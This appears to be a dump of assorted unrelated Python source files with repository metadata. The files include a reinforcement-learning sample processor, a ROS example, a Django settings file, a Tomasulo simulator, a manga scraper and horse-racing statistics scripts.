discount (float): Environment reward discount.
gae_lambda (float): Lambda used for generalized advantage
estimation.
Returns:
dict: Processed sample data, with key
* observations: (numpy.ndarray)
* actions: (numpy.ndarray)
* rewards: (numpy.ndarray)
* baselines: (numpy.ndarray)
* returns: (numpy.ndarray)
* valids: (numpy.ndarray)
* agent_infos: (dict)
* env_infos: (dict)
* paths: (list[dict])
"""
baselines = []
returns = []
total_steps = 0
for idx, path in enumerate(paths):
total_steps += len(path['rewards'])
path_baselines = np.append(baseline_predictions[idx], 0)
deltas = (path['rewards'] + discount * path_baselines[1:] -
path_baselines[:-1])
path['advantages'] = np_tensor_utils.discount_cumsum(
deltas, discount * gae_lambda)
path['deltas'] = deltas
for idx, path in enumerate(paths):
# baselines
path['baselines'] = baseline_predictions[idx]
baselines.append(path['baselines'])
# returns
path['returns'] = np_tensor_utils.discount_cumsum(
path['rewards'], discount)
returns.append(path['returns'])
# make all paths the same length
obs = [path['observations'] for path in paths]
obs = tensor_utils.pad_tensor_n(obs, max_path_length)
actions = [path['actions'] for path in paths]
actions = tensor_utils.pad_tensor_n(actions, max_path_length)
rewards = [path['rewards'] for path in paths]
rewards = tensor_utils.pad_tensor_n(rewards, max_path_length)
returns = [path['returns'] for path in paths]
returns = tensor_utils.pad_tensor_n(returns, max_path_length)
baselines = tensor_utils.pad_tensor_n(baselines, max_path_length)
agent_infos = [path['agent_infos'] for path in paths]
agent_infos = tensor_utils.stack_tensor_dict_list([
tensor_utils.pad_tensor_dict(p, max_path_length) for p in agent_infos
])
env_infos = [path['env_infos'] for path in paths]
env_infos = tensor_utils.stack_tensor_dict_list(
[tensor_utils.pad_tensor_dict(p, max_path_length) for p in env_infos])
valids = [np.ones_like(path['returns']) for path in paths]
valids = tensor_utils.pad_tensor_n(valids, max_path_length)
lengths = np.asarray([v.sum() for v in valids])
samples_data = dict(
observations=obs,
actions=actions,
rewards=rewards,
baselines=baselines,
returns=returns,
valids=valids,
lengths=lengths,
agent_infos=agent_infos,
env_infos=env_infos,
paths=paths,
)
return samples_data
| [
"[email protected]"
] | |
fffa5c425542a1e1841cdb3d6a99d19c9c3b253b | d8740499280fc4ccf6f7f4994fab459ed5d73655 | /src/example6.py | 7adc1c5321a0973ab2bc80dff8d4934edcbec907 | [] | no_license | shadow-robot/ros-workshop | 5c088f78cb66c93ee90ad28aa43f0364b7d39038 | e101dcbcc36a6973af436f644055dcf112e87159 | refs/heads/master | 2021-01-19T11:15:48.309312 | 2013-09-10T07:46:13 | 2013-09-10T07:46:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,013 | py | #!/usr/bin/env python
'''
@file example1.py
@author Ugo Cupcic <[email protected]>
Copyright (c) 2013 Shadow Robot Company Ltd.
All rights reserved.
This code is proprietary and may not be used, copied, distributed without
prior authorisation and agreement from Shadow Robot Company Ltd.
@brief
'''
#importing the package dependencies - always necessary, use package name
import roslib; roslib.load_manifest("ros_workshop")
import rospy
#importing service
from ros_workshop.srv import Test, TestRequest
class Service(object):
"""
"""
def __init__(self, ):
"""
"""
self.service_ = rospy.ServiceProxy("/test5/service", Test)
def call_srv(self, string):
req = TestRequest()
req.input = string
result = self.service_.call(req)
print "Service returned: ", result.output
rospy.init_node("test6")
service = Service()
user_msg = raw_input("Enter some text to send to the service server: ")
service.call_srv(user_msg)
| [
"[email protected]"
] | |
11b28e9d82f1a02507a3691d244e72b7c4236085 | ee974d693ca4c4156121f8cb385328b52eaac07c | /env/lib/python3.6/site-packages/sklearn/externals/joblib/func_inspect.py | acc828b11737c3a6dbc31c469ac00390593e4ea7 | [] | no_license | ngonhi/Attendance_Check_System_with_Face_Recognition | f4531cc4dee565d0e45c02217f73f3eda412b414 | 92ff88cbc0c740ad48e149033efd38137c9be88d | refs/heads/main | 2023-03-12T07:03:25.302649 | 2021-02-26T15:37:33 | 2021-02-26T15:37:33 | 341,493,686 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:db6f68dd571d6f69eee017246e4855f4f652345307fe58e13ac7c132f6e1052f
size 13773
| [
"Nqk180998!"
] | Nqk180998! |
db2ef15c79a0ad3ecce1ba0746e4235a7c432441 | 958a80acfedd6ee11320889c70fc53384e362a55 | /create_waves.py | 2f1745b58b3f6d5852662423752a2c39e10d74ec | [] | no_license | nekech/blender-water-scripts | b1620a547dde8f93da4234b5bc3c9f910d6efbb3 | 5694d3324b4aaa485023fc3ccee301e44a2e6c8f | refs/heads/master | 2020-03-08T06:13:33.869149 | 2018-04-06T07:52:09 | 2018-04-06T07:52:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 810 | py | import bpy
import bmesh
obj = bpy.context.edit_object
me = obj.data
bm = bmesh.from_edit_mesh(me)
bm.faces.active = None
def scalar(a, b):
return a[0]*b[0] + a[1]*b[1]
def getWaveHeight(pos, dir, steepness=1, amplitude=1, velocity=1, wavelength=1, t=1):
fi = velocity * (2 * 3.14 / wavelength)
s = scalar(pos, dir) * (2 * 3.14 / wavelength) + t * fi
waveZ = (sin(s) + 1.0) / 2.0
waveZ = pow(waveZ, steepness)
waveZ = waveZ*amplitude
return waveZ
for v in bm.verts:
if v.select:
v.co.z = getWaveHeight([v.co.x, v.co.y], [0, 1], amplitude=0.2, wavelength=(3.14/10.0))
v.co.z += getWaveHeight([v.co.x, v.co.y], [1, 0], amplitude=0.4, wavelength=(3.14/10.0))
#Thic you can add more waves recomend to use 4 waves.
bmesh.update_edit_mesh(me, True)
| [
"[email protected]"
] | |
e4d11405844fc9dc09f679cf620d2da21493dfec | fa508cb53f41b51b4a3632c4322d97e1b25cfefc | /src/sensor_api/sensor_api/settings.py | 56faeb817eacddac40d6b3a2cbcbabb022a25c2e | [] | no_license | Nishant173/sensor-data-assignment | b4bc1b21c1ae1528dfde1bf8c70e974d3eb0df53 | 08998ce887fb8a37bf1fbb2932c7d009affdd506 | refs/heads/main | 2023-01-21T07:50:43.953785 | 2020-12-02T06:22:30 | 2020-12-02T06:22:30 | 315,087,803 | 0 | 0 | null | 2020-11-25T14:01:23 | 2020-11-22T16:59:37 | Python | UTF-8 | Python | false | false | 3,123 | py | """
Django settings for sensor_api project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kq_s1mom%-g&12bds0dzwji^569cq0qde5y!gwhnb4gs88sj7#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api.apps.ApiConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sensor_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sensor_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
29698006b4599587d123c8ce7290cb3c2b0386b8 | 0c4c749f863c176b3a788c0b0e65117eb0530547 | /readinput.py | a7a28bcf9bc3a769554c7da305a806f85f6cb485 | [
"Apache-2.0"
] | permissive | pankajcoding/TAS | a55e422e1d936ce503048c8e05e1eaa8905af781 | 3acee6afbda489f5c188b67d4ab7924f6c1a0e84 | refs/heads/master | 2020-05-02T20:58:30.593382 | 2019-04-01T11:34:41 | 2019-04-01T11:34:41 | 178,206,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,983 | py | class Instruction:
def __init__(self,op,destreg,sreg1,sreg2):
self.op=op
self.destreg=destreg
self.sreg1=sreg1
self.sreg2=sreg2
class ReservationStation:
def __init__(self,id,busy=1,op=-1,vj=None,vk=None,qj=-1,qk=-1,disp=0):
self.id=id
self.busy=busy
self.op=op
self.vj=vj
self.vk=vk
self.qj=qj
self.qk=qk
self.disp=disp
def dispatch(self):
self.disp=1
def clear(self):
self.busy=0
self.op=-1
self.vj=None
self.vk=None
self.qj=-1
self.qk=-1
self.disp=0
def __str__(self):
return 'RS'+str(self.id)+' '+str(self.busy)+' '+str(self.op)+' '+str(self.vj)+' '+str(self.vk)+' '+str(self.qj)+' '+str(self.qk)+' '+str(self.disp)
class ExecutionUnit:
def __init__(self):
self.busy=0
self.currentRS=None
self.executionStarted=None
# self.destinationRS=None
self.remainingcycles=None
self.op=None
self.arg1=None
self.arg2=None
def clear(self):
self.busy=0
self.curentRS=None
self.executionStarted=None
self.op=None
self.argr1=None
self.arg2=None
self.op=None
def isRSAvailable(opcode):
if (opcode==0 or opcode==1):
#check if add RS is available
if RS[0].busy==0:
#assign instr to rs0
return 0
elif RS[1].busy==0:
return 1
elif RS[2].busy==0:
return 2
else:
# reservation station is not available do not issue instr
return -1
elif (opcode==2 or opcode==3):
#check is multiply RS available
if RS[3].busy==0:
#assign instr to rs0
return 3
elif RS[4].busy==0:
return 4
else:
return -1
def isExecutionUnitFree(op):
if(op==1 or op==0):
return not addExecutionUnit.busy
elif(op==2 or op==3):
return not multExecutionUnit.busy
else:
print('invalid code')
def assignExecutionStation(reservationS,i,cycle):
if (reservationS.op==1 or reservationS.op==0):
addExecutionUnit.busy=1
addExecutionUnit.currentRS=i
addExecutionUnit.executionStarted=cycle+1
addExecutionUnit.op=reservationS.op
addExecutionUnit.arg1=reservationS.vj
addExecutionUnit.arg2=reservationS.vk
return
elif(reservationS.op==2):
multExecutionUnit.busy=1
multExecutionUnit.currentRS=i
multExecutionUnit.executionStarted=cycle+1
multExecutionUnit.op=reservationS.op
multExecutionUnit.arg1=reservationS.vj
multExecutionUnit.arg2=reservationS.vk
return
elif(reservationS.op==3):
multExecutionUnit.busy=1
multExecutionUnit.currentRS=i
multExecutionUnit.remainingcycles=40
multExecutionUnit.executionStarted=cycle+1
multExecutionUnit.op=reservationS.op
multExecutionUnit.arg1=reservationS.vj
multExecutionUnit.arg2=reservationS.vk
return
def writeBack():
#do write back
if addExecutionUnit.busy==1:
if (currentCycle== addExecutionUnit.executionStarted+2):
currentRS=addExecutionUnit.currentRS
if(addExecutionUnit.op==0):
result=addExecutionUnit.arg1+ addExecutionUnit.arg2
else:
result=addExecutionUnit.arg1-addExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
addExecutionUnit.clear()
if multExecutionUnit.busy==1:
if (multExecutionUnit.op==2 and currentCycle== (multExecutionUnit.executionStarted+10)):
currentRS=multExecutionUnit.currentRS
result=multExecutionUnit.arg1* multExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
multExecutionUnit.clear()
elif (multExecutionUnit.op==3 and currentCycle== (multExecutionUnit.executionStarted+40)):
currentRS=multExecutionUnit.currentRS
result=multExecutionUnit.arg1/ multExecutionUnit.arg2
for i in range(len(RAT)):
if(RAT[i]== currentRS):
RF[i]= result
RAT[i]=None
for i in range(len(RS)):
if(RS[i].qk==currentRS):
RS[i].vk=result
RS[i].qk=-1
if(RS[i].qj==currentRS):
RS[i].vj=result
RS[i].qj=-1
RS[currentRS].clear()
multExecutionUnit.clear()
# print('division done result is ',result)
def simulateCycle():
global currentCycle
#1. issue
if len(instrList)>0:
freestation=isRSAvailable(instrList[0].op)
if(freestation!=-1):
#issue the instr
instr=instrList.pop(0)
RS[freestation].busy=1
RS[freestation].op=instr.op
#first source register
if(RAT[instr.sreg1]==None):
#assign value from RF
RS[freestation].vj=RF[instr.sreg1]
else:
#assign value from RS
RS[freestation].qj=RF[instr.sreg1]
#second source register
if(RAT[instr.sreg2]==None):
#assign value from RF
RS[freestation].vk=RF[instr.sreg2]
else:
#assign value from RS
RS[freestation].qk=RF[instr.sreg2]
RAT[instr.destreg]=freestation
else:
# RS is not available do nothing
pass
#2 dispatch
# see if among RS their is any station with both ready values
for i in range(len(RS)):
if(RS[i].busy==1 and RS[i].disp==0):
if(RS[i].vj!=None and RS[i].vk!=None):
if(isExecutionUnitFree(RS[i].op)==1):
RS[i].disp=1
assignExecutionStation(RS[i],i,currentCycle)
#3 execute
#4 writeback
writeBack()
currentCycle+=1
def printReservationStation(RS):
print('\nReservation Stations')
print('RS busy op Vj Vk Qj Qk Disp')
for i in range(len(RS)):
print(RS[i])
printRAT(RAT)
def printRAT(RAT):
print('-----------------------------')
print(' ','RF RAT')
for i in range(len(RAT)):
print(i,': ',RF[i],end="")
if(RAT[i]!=None):
print(' RS',RAT[i],sep="")
else:
print('')
def printInstructions():
global instrList
print('-----------------------------')
print('Instruction Queue')
for instr in instrList:
if(instr.op==0):
print("ADD",end=" ")
if(instr.op==1):
print("Sub",end=" ")
if(instr.op==2):
print("Mul",end=" ")
if(instr.op==3):
print("Div",end=" ")
print("R",instr.destreg,", ","R",instr.sreg1,", ","R",instr.sreg2,sep="")
print()
addExecutionUnit=ExecutionUnit()
multExecutionUnit=ExecutionUnit()
currentCycle=1
with open("input.txt","r") as f:
content=f.read().splitlines()
n=int(content[0])
cycles=int(content[1])
instrList=[]
# reading instructions
for i in range(n):
temp = [int(value) for value in content[i+2].split()]
tempInstr=Instruction(temp[0],temp[1],temp[2],temp[3])
instrList.append(tempInstr)
# index i stores Ri register Value
RF=[] #index 0 is empty
for i in range(n+2,n+10):
RF.append(int(content[i]))
RAT=[None]*8
RS=[]
for i in range(5):
temp=ReservationStation(busy=0,id=i,op=-1,vj=None,vk=None,qj=-1,qk=-1,disp=0)
RS.append(temp)
print('After cycle ',cycles)
for i in range(cycles):
simulateCycle()
printReservationStation(RS)
printInstructions()
| [
"[email protected]"
] | |
c255cb8d3213b6bc36e417faaae47d76d3f94ba6 | a7e1003a57bea59e4209c36c9e4493686b546c88 | /manga_py/providers/blogtruyen_com.py | 9e2ae01e7e0605f5b9444acad1b0067ebf35a9d9 | [
"MIT"
] | permissive | terepanda/manga-dl | b7de04ea42d64c71689860502895bf0bc274f9a4 | 2ac3a314c2f67ad22f6da7e293ec6b3a132d7834 | refs/heads/stable_1.x | 2020-04-28T09:22:26.055562 | 2019-03-11T16:07:00 | 2019-03-11T16:07:00 | 173,831,799 | 0 | 0 | MIT | 2019-03-04T22:30:24 | 2019-03-04T22:30:24 | null | UTF-8 | Python | false | false | 1,169 | py | from manga_py.provider import Provider
from .helpers.std import Std
class BlogTruyenCom(Provider, Std):
def get_chapter_index(self) -> str:
idx = self.re.search(r'\.com/c(\d+)/', self.chapter)
return '{}-{}'.format(self.chapter_id, idx.group(1))
def get_main_content(self):
url = self._test_main_url(self.get_url())
return self.http_get(self.http().normalize_uri(url))
def _test_main_url(self, url):
if ~url.find('.com/c'):
selector = '.breadcrumbs a + a'
url = self.html_fromstring(url, selector, 0).get('href')
return url
def get_manga_name(self) -> str:
url = self._test_main_url(self.get_url())
return self.re.search(r'/\d+/([^/]+)', url).group(1)
def get_chapters(self):
return self._elements('#list-chapters .title > a')
def get_files(self):
items = self.html_fromstring(self.chapter, '#content img')
return [i.get('src') for i in items]
def get_cover(self) -> str:
return self._cover_from_content('.thumbnail img')
def book_meta(self) -> dict:
# todo meta
pass
main = BlogTruyenCom
| [
"[email protected]"
] | |
319167886dffc046f9ce22266a6bc0400ffc7754 | 49197a748adea1618a2cece7a1ae057006da090c | /jgodwin/diff/SConstruct | 7b12c08a428e67563eadff2e3eb80b8b3403a1b8 | [] | no_license | psava/cwp12 | 0bbb1f213c66737509280fc4b0ac5c53b52d017a | 3f47c1bf358caa5ebe608ab88fc12b85fd489220 | refs/heads/master | 2021-01-10T21:24:57.572992 | 2012-10-10T15:52:18 | 2012-10-10T15:52:18 | 2,213,082 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 273 | from rsf.proj import *
import fdutil
import acousticfd as fd
par = dict(
nx=601,ox=0.0,dx=10.0,
nz=401,oz=0.0,dz=10.0,
nt=1501,ot=0.0,dt=0.002,kt=100,freq=25
)
fdpar = fdutil.defaults(nb=50,**par)
fdutil.constant2d('vel',2000,**par)
Flow('den',
'''
| [
"[email protected]"
] | ||
594d55a79cd1cf6b6b9519c922596c329b7cfe99 | 1125e5999b20df75ef18e6780154ed2ea1e3ea26 | /src/miniserver/routes.py | 3ac633f978c7cfb7ffa26f176c314933a6f4cf11 | [] | no_license | fabiommendes/miniserver | 426593b2204dc2d12a944f361b3285f055157b18 | 0b82263ff01716583e110d0bfee506363f4f047a | refs/heads/master | 2021-01-23T06:15:11.264330 | 2017-03-27T14:45:43 | 2017-03-27T14:45:43 | 86,347,361 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,574 | py | import warnings
from collections import OrderedDict
from functools import singledispatch
import functools
ROUTES = OrderedDict()
DEFAULT_PAGE_NAMES = {'index': ''}
def route(url=None, **kwargs):
"""
Decorator that defines a route in your web page.
"""
if callable(url) and url.__name__ in DEFAULT_PAGE_NAMES:
return route(DEFAULT_PAGE_NAMES[url.__name__], **kwargs)(url)
elif callable(url):
return route(url.__name__, **kwargs)(url)
def decorator(func):
url_route = func.__name__ if url is None else url.lstrip('/')
if url_route in ROUTES:
warnings.warn('duplicate route: %r' % url)
else:
ROUTES[url_route] = wrapped_view(func, **kwargs)
return func
return decorator
def regex_escape(st):
return st
def regex_from_route(route):
"""
Convert a route string in the form part1/part2/{varname}/ to a Django url
regex.
"""
regex, tail = '', route
while tail:
pre, sep, tail = tail.partition('{')
regex += regex_escape(pre)
if sep:
varname, sep, tail = tail.partition('}')
if not sep:
raise ValueError('brakets in route string do not match: %r' % route)
regex += r'(?P<%s>[^\/]*)' % varname
return regex
def make_url_patterns():
"""
Return a list of url_patterns from the registered routes.
"""
from django.conf.urls import url
# Index is handled differently.
routes = dict(ROUTES)
routes.pop('', None)
result = []
for route, view in routes.items():
result.append(url(regex_from_route(route), view))
return result
def update_context(context):
import miniserver
context.setdefault('settings', miniserver.settings)
def render(request, template, context=None, **kwargs):
from django.shortcuts import render
context = dict(context or {}, **kwargs)
update_context(context)
return render(request, template, context)
@singledispatch
def wrap_to_request(data, request, template='base.html'):
return render(request, template, {'body': data})
@wrap_to_request.register(dict)
def _(data, request, template='base.html'):
return render(request, template, data)
def wrapped_view(view, **kwargs):
"""
Wraps a miniserver view function in a Django-compatible view function.
"""
@functools.wraps(view)
def django_view(request, **dj_kwargs):
kwargs['request'] = request
return wrap_to_request(view(**dj_kwargs), **kwargs)
return django_view | [
"[email protected]"
] | |
1110a852257efa822e45b22417016e5fbcfa0ea7 | abefff4117482aed495b2c17bc0d3cc5a178fcc7 | /ReleaseBuilds/Linux/resources/maps/Generate/checks.py | 450f60723fb2a9697187d839cabb0e3861102809 | [] | no_license | blazingkin/gamejam-2020 | f2163d1d03ddae7c4bc65f25dd1211e9173a6e6d | 0bb8025bb03dc92c4d1a599049c5008f8a67e92f | refs/heads/master | 2022-08-04T05:27:41.263512 | 2020-05-25T01:13:32 | 2020-05-25T01:13:32 | 266,653,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | def checkBlack(r, g, b, a):
if (r == 0 and b == 0 and g == 0 and a == 255):
return True
return False
def checkWhite(r, g, b, a):
if (r == 255 and b == 255 and g == 255 and a == 255):
return True
return False
def checkBlue(r, g, b, a):
if (r == 0 and b == 255 and g == 0 and a == 255):
return True
return False
def checkGreen(r, g, b, a):
if (r == 0 and b == 0 and g == 255 and a == 255):
return True
return False
def checkRed(r, g, b, a):
if (r == 255 and b == 0 and g == 0 and a == 255):
return True
return False
| [
"[email protected]"
] | |
1e4a51bf9b32795d916f228d5b11336efe9b2520 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/ndxthr005/question3.py | 110544217c857301086e741cfc1f0e2b7ba094fb | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | #thrianka naidoo
#ndxthr005
#question3
import math
x=0
y=2
z=2
while x!=2:
x=math.sqrt(2+x)
z=z*(y/x)
print("Approximation of pi: ", round(z,3),sep='')
radius=eval(input("Enter the radius: \n"))
a=z * (radius**2)
print("Area: ",round(a,3),sep='')
| [
"[email protected]"
] | |
7dac095e246f04b16e09db800a5c43df285578fc | 51240868244b76ae9208d05483550a3ae3cdeabc | /config.py | e60d3ddad5ef9fe8d63e0092d59a33186902b439 | [
"MIT"
] | permissive | annechege/Online-event | 396401c66fd087f3ace64d15ef645e4357168004 | 3ea69e416550171cbb86279674412eee3d171f6d | refs/heads/master | 2023-06-01T12:27:43.146440 | 2021-06-24T17:11:00 | 2021-06-24T17:11:00 | 379,850,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | import os
class Config:
API_KEY=os.environ.get("API_KEY")
NEWS_API_BASE_URL='https://newsapi.org/v2/sources?country=us&category={}&apiKey={}'
NEWS_ARTICLES_APL_URL='https://newsapi.org/v2/everything?q={}&apiKey={}'
SOURCE_ARTICLES_URL='https://newsapi.org/v2/everything?sources={}&apiKey='
class DevConfig(Config):
DEBUG = True
config_options = {
'development':DevConfig
} | [
"[email protected]"
] | |
cc819f12b3cba1ace7ecccad91aac01edc8bd75f | 13b02ce7a295f2d05ebe6dfde1af4a4910c0c97e | /Scripts/dataset_statistics.py | 07200b74cfc21baec99bda397ed5693b74f2f595 | [] | no_license | mohankumargupta/University-Project | 1cd00cc121f13f1c4614b0de9500c1899fa8b19f | 1c011ca2cae8371dfeb0bb7aa2c92ec24f2e2789 | refs/heads/master | 2021-01-12T09:44:38.543088 | 2014-04-03T10:07:21 | 2014-04-03T10:07:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,214 | py | from collections import Counter
from horse_parser import HorseParser
from race_parser import RaceParser
from horse_parser_no_handicaps import HorseParserNoHandicaps
from race_parser_no_handicaps import RaceParserNoHandicaps
''' Computes the number of races in the dataset for which the dataset contains the records of all participating horses '''
def no_of_races_with_all_horses(races):
total_races = 0
for r in races:
if len(races[r].horses) == races[r].no_of_runners:
total_races += 1
return total_races
''' Computes the number of races in the dataset for which the dataset contains the record of the winning horse '''
def no_of_races_with_winner(races, horses):
total_races = 0
for r in races:
if races[r].winner and horses[races[r].winner]:
total_races += 1
return total_races
''' Computes the average number of races per horse within the dataset '''
def average_no_of_races_per_horse(horses):
total_races = 0
for h in horses:
total_races += len(horses[h].races)
average_races = float(total_races)/len(horses)
return average_races
''' Returns the races which contain the records of all horses in the dataset '''
def get_full_races(races):
full_races = {}
for r in races:
if len(races[r].horses) == races[r].no_of_runners:
full_races[races[r].race_key] = races[r]
return full_races
''' Computes the ages of horses in races where all horse records are present in the dataset '''
def get_ages(full_races):
ages = set()
for r in full_races:
for h in full_races[r].horses:
ages.add(h.age)
return ages
''' Computes the number of races for horses at each age. Only takes into account those races which have all runners '''
def races_at_each_age(full_races, ages_set):
no_of_races_per_age = Counter()
for a in ages_set:
total_races = 0
for r in full_races:
ages = [h.age for h in full_races[r].horses]
if max(ages) == a:
total_races += 1
no_of_races_per_age[a] = total_races
return no_of_races_per_age
''' Computes the number of races with k missing horses in the dataset '''
def races_with_k_missing_runners(races):
races_with_missing_horses = Counter()
for r in races:
missing_runners = races[r].no_of_runners - len(races[r].horses)
races_with_missing_horses[missing_runners] += 1
return races_with_missing_horses
''' Computes the frequency of races with k horses participating '''
def races_with_k_runners(races):
races_with_k_horses = Counter()
for r in races:
races_with_k_horses[races[r].no_of_runners] += 1
return races_with_k_horses
#''' Computes the number of races which contain the information for the winning horse '''
'''
def races_with_winning_horse(races):
races_with_winner = 0
for r in races:
for h in races[r].horses:
if races[r].winner == h.horse_key:
races_with_winner += 1
return races_with_winner
'''
def main():
horse_parser_98 = HorseParser('./../Data/born98.csv')
horse_parser_05 = HorseParser('./../Data/born05.csv')
race_parser_98 = RaceParser('./../Data/born98.csv')
race_parser_05 = RaceParser('./../Data/born05.csv')
horse_parser_no_handicaps_98 = HorseParserNoHandicaps('./../Data/born98.csv')
horse_parser_no_handicaps_05 = HorseParserNoHandicaps('./../Data/born05.csv')
race_parser_no_handicaps_98 = RaceParserNoHandicaps('./../Data/born98.csv')
race_parser_no_handicaps_05 = RaceParserNoHandicaps('./../Data/born05.csv')
horses98 = horse_parser_98.horses
horses05 = horse_parser_05.horses
races98 = race_parser_98.races
races05 = race_parser_05.races
full_races_98 = get_full_races(races98)
full_races_05 = get_full_races(races05)
total_races_with_all_horses_98 = no_of_races_with_all_horses(races98)
total_races_with_winners_98 = no_of_races_with_winner(races98, horses98)
total_races_with_all_horses_05 = no_of_races_with_all_horses(races05)
total_races_with_winners_05 = no_of_races_with_winner(races05, horses05)
average_races_per_horse_98 = average_no_of_races_per_horse(horses98)
average_races_per_horse_05 = average_no_of_races_per_horse(horses05)
ages98 = get_ages(full_races_98)
ages05 = get_ages(full_races_05)
no_of_races_per_age_98 = races_at_each_age(full_races_98, ages98)
no_of_races_per_age_05 = races_at_each_age(full_races_05, ages05)
races_with_k_missing_horses_98 = races_with_k_missing_runners(races98)
races_with_k_missing_horses_05 = races_with_k_missing_runners(races05)
print 'born98.csv file statistics:'
print 'No. of horses: ' + str(len(horses98))
print 'No. of races: ' + str(len(races98))
print 'No. of races for which we have all the horses: ' + str(total_races_with_all_horses_98)
print 'No. of races for which we have the winner: ' + str(total_races_with_winners_98)
print 'Fraction of races for which we have all the horses: ' + str(float(total_races_with_all_horses_98)/len(races98))
print 'Fraction of races for which we have the winner: ' + str(float(total_races_with_winners_98)/len(races98))
print 'Average no. of races per horse: ' + str(average_races_per_horse_98)
print 'No. of races for horses at each age: ' + str(no_of_races_per_age_98)
print 'No. of races with k-missing horse records: ' + str(races_with_k_missing_horses_98)
print 'No. of horse records with comptime missing: ' + str(horse_parser_98.comptime_missing)
print 'No. of race records with comptime missing: ' + str(race_parser_98.comptime_missing)
print 'No. of horse records with Irish race class: ' + str(horse_parser_98.irish_races)
print 'No. of race records with Irish race class ' + str(race_parser_98.irish_races)
print 'No. of races without handicap races:' + str()
print ''
print 'born05.csv file statistics:'
print 'No. of horses: ' + str(len(horses05))
print 'No. of races: ' + str(len(races05))
print 'No. of races for which we have all the horses: ' + str(total_races_with_all_horses_05)
print 'No. of races for which we have the winner: ' + str(total_races_with_winners_05)
print 'Fraction of races for which we have all the horses: ' + str(float(total_races_with_all_horses_05)/len(races05))
print 'Fraction of races for which we have the winner: ' + str(float(total_races_with_winners_05)/len(races05))
print 'Average no. of races per horse: ' + str(average_races_per_horse_05)
print 'No. of races for horses at each age: ' + str(no_of_races_per_age_05)
print 'No. of races with k-missing horse records: ' + str(races_with_k_missing_horses_05)
print 'No. of horse records with comptime missing: ' + str(horse_parser_05.comptime_missing)
print 'No. of race records with comptime missing: ' + str(race_parser_05.comptime_missing)
print 'No. of horse records with Irish race class: ' + str(horse_parser_05.irish_races)
print 'No. of race records with Irish race class ' + str(race_parser_05.irish_races)
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
